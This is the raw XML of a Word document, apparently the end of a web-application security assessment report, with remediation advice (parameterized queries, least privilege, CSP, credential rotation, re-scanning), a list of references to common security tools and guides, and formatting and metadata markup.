    <w:p w14:paraId="27D2C992" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Immediate actions: patch/update, enforce parameterized queries and least-privilege DB accounts, add output encoding/CSP, rotate affected credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8BA820" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Next step: re-scan and manually verify fixes; prioritize high-risk items first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C1587" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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4BDB567" w14:textId="2B0C8AF8" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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4B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE53232" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Metasploit Framework — official docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC372B7" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>OWASP — Testing Guide &amp; OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814CC6B" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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4B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy (Burp labs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F2FB1E" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Exploit-DB — PoC repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549863FF" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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4B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wireshark &amp; Volatility — evidence collection tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20645EFB" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="009B72D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sectPr w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432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66799" w14:textId="77777777" w:rsidR="00651832" w:rsidRDefault="00651832">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2BD6CA94" w14:textId="77777777" w:rsidR="00651832" w:rsidRDefault="006518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6DC92" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="67EEA394">
        <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1" w14:textId="14EF469B" w:rsidR="00C776D2" w:rsidRDefault="003B4604" w:rsidP="003B4604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5DB80" w14:textId="77777777" w:rsidR="00651832" w:rsidRDefault="00651832">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BCBB97F" w14:textId="77777777" w:rsidR="00651832" w:rsidRDefault="006518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51FCB" w14:textId="68D5EA92" w:rsidR="00C776D2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5E4292F4" wp14:editId="3B0C74EE">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1444461</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342899</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618141" cy="1023938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6796"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="8618141" cy="1023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7A27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A5A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F4180"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11ECF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066EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65282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DD615E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BAE3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7754B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A61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087FD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D18EC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3A5AA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72E8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951DDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFDC3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BA0877"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCC84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60610C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5761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25664B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C4AC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722EB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F8E2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E823FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9162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FC7BDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E50E0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E4044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D8AA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A032FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2482D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105B8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="846C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8C5403"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E6E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94736D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B02C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CF726B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87DEE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254009"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C74A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FA311E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DE44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44306D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="198A2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456E5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B3E6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051D71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7548C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A62CA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ED4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190B66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F743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8E84F52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB28D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7D3A8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F642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776114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB06B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B73CF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7961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A16EC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3646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37801E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0FE1C4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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45940AFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6280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8262801"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7B64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ABC579A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAB6D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AC3A7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3782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836F0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BE25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FD5141"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0A6C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E95563"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E996D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55A1301"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81669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5B588F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57D0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950737"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B26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BE70671"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6C2D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E326432"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F4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6B07FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57A8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743DAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED3E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38647C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32648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8D6037"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D31A3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6D7079F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D02F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F64B24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC48C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B37DA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8BCC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D3553C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F412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791C78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9668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A63576"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AB24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E51EF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="939A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A77DA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5356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10F229C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E03C0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1342CB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FC49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7D635E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB683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64F1061"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CEE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FC7D94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D62CD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A20705A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0590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872282"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="329A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393778">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2052335878">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1053777705">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="519780418">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="804199195">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1090931089">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="143357932">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1709723927">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1018115456">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2093695468">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="173037849">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1171524651">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="217907236">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="98331589">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1349943238">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="418210737">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="629550101">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1171217570">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2041007327">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="214242127">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="193153935">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1222447045">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1851142051">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="895626071">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1242058298">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1078677664">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="308677776">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="530460631">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="365301251">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1734235221">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1885023832">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1528568139">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="493106940">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="750472162">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="31002741">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1721249638">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1492791129">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1255478625">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="996956281">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="901913270">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="787042025">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="25300145">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1429891776">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="915673580">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="617487863">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1249192743">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="679160168">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1213343892">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="863398033">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1634946353">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1320887973">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="952832381">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1996953459">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="2046563165">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1484930480">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="220138756">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1644001226">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="2144031941">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="585387849">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1374844319">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="284124425">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1588611369">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1867984002">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="106175678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6D2"/>
    <w:rsid w:val="0000430C"/>
    <w:rsid w:val="00121BEC"/>
    <w:rsid w:val="00157CCE"/>
    <w:rsid w:val="0028233E"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="00445807"/>
    <w:rsid w:val="004B0A4F"/>
    <w:rsid w:val="00521904"/>
    <w:rsid w:val="0058251A"/>
    <w:rsid w:val="00651832"/>
    <w:rsid w:val="00861B7F"/>
    <w:rsid w:val="009B72D7"/>
    <w:rsid w:val="009D6235"/>
    <w:rsid w:val="009E39E7"/>
    <w:rsid w:val="00AD5B5D"/>
    <w:rsid w:val="00B27C06"/>
    <w:rsid w:val="00B955DC"/>
    <w:rsid w:val="00BD055D"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00C80F89"/>
    <w:rsid w:val="00CF4602"/>
    <w:rsid w:val="00DB254B"/>
    <w:rsid w:val="00DE60ED"/>
    <w:rsid w:val="00F4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967B39"/>
  <w15:docId w15:val="{12E79056-DB07-44CB-B4D1-13A6888AD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604"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B4604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604"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD05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055D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861B7F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861B7F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">
    <w:name w:val="Grid Table 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="00861B7F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">
    <w:name w:val="Grid Table 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="009E39E7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8251A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GridTable6Colorful">
    <w:name w:val="Grid Table 6 Colorful"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="0058251A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B0A4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198.168.178.150/form.php" TargetMode="External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yperlink" Target="http://198.168.178.150/login.php" TargetMode="External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://198.168.178.150/form.php" TargetMode="Externa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198.168.178.150/login.php" TargetMode="Externa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1600</Words>
  <Characters>9125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Akanksha KJ</dc:creator>
  <cp:lastModifiedBy>Akanksha KJ</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-02T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-02T13:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>